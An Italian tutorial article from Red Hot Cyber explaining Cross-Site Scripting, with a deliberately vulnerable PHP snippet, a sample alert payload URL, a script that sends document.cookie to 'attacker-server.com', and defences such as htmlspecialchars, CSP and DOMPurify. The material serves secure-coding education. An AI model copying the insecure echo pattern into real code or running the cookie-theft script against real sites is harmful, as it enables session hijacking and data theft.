Red Hot Cyber
Condividi la tua difesa. Incoraggia l'eccellenza. La vera forza della cybersecurity risiede nell'effetto moltiplicatore della conoscenza.
Condividi la tua difesa. Incoraggia l'eccellenza.
La vera forza della cybersecurity risiede
nell'effetto moltiplicatore della conoscenza.
UtiliaCS 970x120
320×100
Scopriamo il Cross-Site Scripting (XSS) tra codice sorgente ed exploit

Scopriamo il Cross-Site Scripting (XSS) tra codice sorgente ed exploit

28 Giugno 2023 08:23

Il Cross-Site Scripting (XSS) è una vulnerabilità di sicurezza che si verifica quando un attaccante inserisce del codice malevolo (solitamente JavaScript) in una pagina web visualizzata da altri utenti. L’obiettivo dell’attaccante è quello di eseguire codice sul browser dell’utente e di rubare informazioni sensibili come cookie, password e altre informazioni personali.

L’attacco XSS si verifica quando un’applicazione web non valida correttamente o filtra i dati immessi dagli utenti e li utilizza senza alcuna verifica o protezione. In questo caso, l’attaccante può inserire codice malevolo nei campi di input dell’applicazione web, come campi di ricerca o di commento, che poi verranno visualizzati agli utenti che accedono alla stessa pagina web.

I tre principali tipi di Cross-Site Scripting (XSS)

Ci sono tre tipi principali di attacchi XSS:

  1. Stored XSS: in cui il codice malevolo viene immagazzinato su un server e viene eseguito ogni volta che un utente accede alla pagina web in cui è stato inserito.
  2. Reflected XSS: in cui il codice malevolo viene inserito nell’URL della pagina web e viene eseguito quando l’utente accede a tale URL.
  3. DOM-based XSS: in cui il codice malevolo viene eseguito lato client, utilizzando JavaScript, e non viene trasmesso al server.

Christmas Sale

Christmas Sale -40%
𝗖𝗵𝗿𝗶𝘀𝘁𝗺𝗮𝘀 𝗦𝗮𝗹𝗲! Sconto del 𝟰𝟬% 𝘀𝘂𝗹 𝗽𝗿𝗲𝘇𝘇𝗼 𝗱𝗶 𝗰𝗼𝗽𝗲𝗿𝘁𝗶𝗻𝗮 del Corso "Dark Web & Cyber Threat Intelligence" in modalità E-Learning sulla nostra Academy!🚀 Fino al 𝟯𝟭 𝗱𝗶 𝗗𝗶𝗰𝗲𝗺𝗯𝗿𝗲, prezzi pazzi alla Red Hot Cyber Academy. 𝗧𝘂𝘁𝘁𝗶 𝗶 𝗰𝗼𝗿𝘀𝗶 𝘀𝗰𝗼𝗻𝘁𝗮𝘁𝗶 𝗱𝗲𝗹 𝟰𝟬% 𝘀𝘂𝗹 𝗽𝗿𝗲𝘇𝘇𝗼 𝗱𝗶 𝗰𝗼𝗽𝗲𝗿𝘁𝗶𝗻𝗮.
Per beneficiare della promo sconto Christmas Sale, scrivici ad [email protected] o contattaci su Whatsapp al numero di telefono: 379 163 8765.


Supporta Red Hot Cyber attraverso: 

  1. L'acquisto del fumetto sul Cybersecurity Awareness
  2. Ascoltando i nostri Podcast
  3. Seguendo RHC su WhatsApp
  4. Seguendo RHC su Telegram
  5. Scarica gratuitamente “Byte The Silence”, il fumetto sul Cyberbullismo di Red Hot Cyber

Se ti piacciono le novità e gli articoli riportati su di Red Hot Cyber, iscriviti immediatamente alla newsletter settimanale per non perdere nessun articolo. La newsletter generalmente viene inviata ai nostri lettori ad inizio settimana, indicativamente di lunedì.

Per proteggersi dall’attacco XSS, è importante che le applicazioni web filtrino e validino correttamente i dati immessi dagli utenti e che utilizzino tecniche di protezione come l’encoding delle stringhe di input e l’utilizzo di header HTTP come Content-Security-Policy (CSP). Inoltre, gli utenti devono prestare attenzione ai link sospetti e alle email di phishing che possono contenere codice malevolo.

Un esempio pratico tra codice ed exploit

In questo esempio analizzeremo una semplice vulnerabilità di Cross Site Scripting osservando prima il codice sorgente e poi un exploit che sfrutta la falla di sicurezza.

Ricordiamo sempre che un exploit è un programma o un codice che sfrutta una vulnerabilità presente in un software o sistema per ottenere un accesso non autorizzato o per causare danni al sistema stesso. L’exploit può essere utilizzato da un attaccante per eseguire codice malevolo, rubare informazioni o causare altri danni al sistema.

Ecco un esempio di codice sorgente PHP che contiene una vulnerabilità di XSS:

<?php
// La variabile "name" è stata passata attraverso il metodo GET
$name = $_GET['name'];

// Stampa il nome sullo schermo
echo "<h1>Benvenuto " . $name . "!</h1>";
?>

In questo esempio, il parametro name viene passato come input dal client al server attraverso il metodo GET. Tuttavia, il codice non filtra o valida la variabile name prima di stamparla sulla pagina.

Questo significa che un utente malintenzionato può inserire del codice HTML o JavaScript malevolo nella variabile name, che verrà poi eseguito sul browser dell’utente che accede alla pagina.

Ecco un esempio di exploit che sfrutta questa vulnerabilità:

http://example.com/welcome.php?name=<script>alert('XSS')</script>

In questo caso, l’attaccante ha inserito del codice JavaScript tra i tag <script> e </script> nella variabile name. Quando l’utente accede alla pagina, il codice JavaScript viene eseguito automaticamente e visualizza una finestra di alert con il messaggio “XSS”.

In un attacco reale, l’attaccante potrebbe utilizzare questa vulnerabilità per rubare informazioni personali dell’utente, ad esempio utilizzando JavaScript per inviare i cookie dell’utente ad un server controllato dall’attaccante.

Per evitare questa vulnerabilità, il codice dovrebbe filtrare e validare correttamente l’input dell’utente, ad esempio utilizzando la funzione htmlspecialchars() per codificare i caratteri speciali HTML e prevenire l’esecuzione del codice JavaScript inserito dall’utente.

Ad esempio in questo codice,

<script>
var cookie = document.cookie;
var img = new Image();
img.src = "http://attacker-server.com/steal.php?cookie=" + cookie;
</script>

Come evitare gli attacchi di Cross-Site Scripting

Gli attacchi XSS possono essere prevenuti implementando alcune misure di sicurezza, tra cui:

  1. Validazione dell’input utente: assicurarsi che l’input utente venga validato in modo adeguato, ad esempio utilizzando filtri per rifiutare l’input non valido o limitare la lunghezza dell’input.
  2. Codifica dell’output: assicurarsi che l’output venga correttamente codificato, ad esempio utilizzando la funzione htmlspecialchars() di PHP per convertire i caratteri speciali in entità HTML.
  3. Utilizzo di librerie di prevenzione XSS: molte librerie JavaScript, come jQuery, forniscono metodi per evitare gli attacchi XSS. Ad esempio, jQuery fornisce la funzione .text() per impostare il contenuto di un elemento come testo semplice, evitando così l’inserimento di codice HTML.

Tra le librerie di prevenzione XSS più famose ci sono:

  1. OWASP ESAPI (Enterprise Security API): una libreria Java open source che fornisce metodi per prevenire gli attacchi XSS e altri tipi di attacchi comuni.
  2. DOMPurify: una libreria JavaScript che pulisce il contenuto HTML di una pagina web per rimuovere qualsiasi codice pericoloso.
  3. HTML Purifier: una libreria PHP che valida e pulisce il contenuto HTML di una pagina web per evitare gli attacchi XSS e altri attacchi basati su HTML.

Implementare queste misure di sicurezza può aiutare a prevenire gli attacchi XSS e proteggere il tuo sito web dagli hacker.

L’importanza dello sviluppo sicuro del codice oggi

Lo sviluppo sicuro del codice è un’importante pratica per garantire che i software moderni siano protetti contro le minacce informatiche, come gli attacchi informatici, le vulnerabilità e i bug.

In un mondo sempre più digitale, i software sono presenti in ogni aspetto della vita moderna, dalla gestione dei dati aziendali alle transazioni finanziarie online, dall’assistenza sanitaria all’intrattenimento. Con l’aumento della quantità di informazioni sensibili che vengono scambiate attraverso questi sistemi, la sicurezza dei software diventa sempre più critica.

Lo sviluppo sicuro del codice aiuta a proteggere le informazioni personali, finanziarie e aziendali dagli attacchi informatici, come ad esempio l’hacking, il phishing e l’iniezione di codice malevolo. Questa pratica comprende l’adozione di procedure e tecniche di programmazione che riducono il rischio di vulnerabilità, come la validazione dei dati di input, la gestione sicura delle password e la gestione degli errori.

Inoltre, lo sviluppo sicuro del codice aiuta anche ad aumentare la fiducia degli utenti nei software e nei servizi online, migliorando la reputazione dell’azienda che li fornisce. Ciò può portare ad un maggior utilizzo di questi servizi e a un maggior successo commerciale.

In sintesi, l’importanza dello sviluppo sicuro del codice su software moderni deriva dalla necessità di proteggere le informazioni sensibili, di aumentare la fiducia degli utenti e di garantire la continuità degli affari.

Seguici su Google News, LinkedIn, Facebook e Instagram per ricevere aggiornamenti quotidiani sulla sicurezza informatica. Scrivici se desideri segnalarci notizie, approfondimenti o contributi da pubblicare.

Immagine del sito
Redazione

La redazione di Red Hot Cyber è composta da un insieme di persone fisiche e fonti anonime che collaborano attivamente fornendo informazioni in anteprima e news sulla sicurezza informatica e sull'informatica in generale.

Lista degli articoli

Articoli in evidenza

Immagine del sitoCybercrime
EDR Nel mirino: i forum underground mettono in vendita NtKiller
Redazione RHC - 25/12/2025

All’interno di un forum underground chiuso, frequentato da operatori malware e broker di accesso iniziale, è comparso un annuncio che ha attirato l’attenzione della comunità di cyber threat intelligence. Il post promuove “NtKiller”, una presunta…

Immagine del sitoCyber Italia
26 milioni di nomi e numeri telefonici di italiani messi all’asta nel Dark Web
Redazione RHC - 24/12/2025

Mentre la consapevolezza sulla cybersicurezza cresce, il mercato nero dei dati personali non accenna a fermarsi. Un recente post apparso su un noto forum frequentato da criminali informatici in lingua russa, scoperto dai ricercatori di…

Immagine del sitoInnovazione
Le botnet robot stanno arrivando! Gli umanoidi propagano malware autonomo
Redazione RHC - 24/12/2025

prima di leggere questo articolo, vogliamo dire una cosa fondamentale: la robotica sta avanzando più velocemente degli approcci per proteggerla. Le macchine stanno diventando più intelligenti e accessibili, ma la sicurezza delle interfacce, dei protocolli…

Immagine del sitoCybercrime
Webrat: quando la voglia di imparare sicurezza informatica diventa un vettore d’attacco
Redazione RHC - 24/12/2025

C’è un momento preciso, quasi sempre notturno, in cui la curiosità supera la prudenza. Un repository appena aperto, poche stelle ma un exploit dal punteggio altissimo, il file README scritto bene quanto basta da sembrare…

Immagine del sitoCybercrime
Cloud sotto tiro: la campagna PCPcat compromette 59.128 server in 48 ore
Redazione RHC - 24/12/2025

Una campagna di cyberspionaggio su larga scala, caratterizzata da un elevato livello di automazione, sta colpendo in modo sistematico l’infrastruttura cloud che supporta numerose applicazioni web moderne. In meno di 48 ore, decine di migliaia…